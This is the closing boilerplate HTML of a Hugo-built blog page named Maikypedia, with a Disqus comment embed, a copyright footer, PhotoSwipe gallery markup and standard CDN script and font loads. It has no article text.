<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
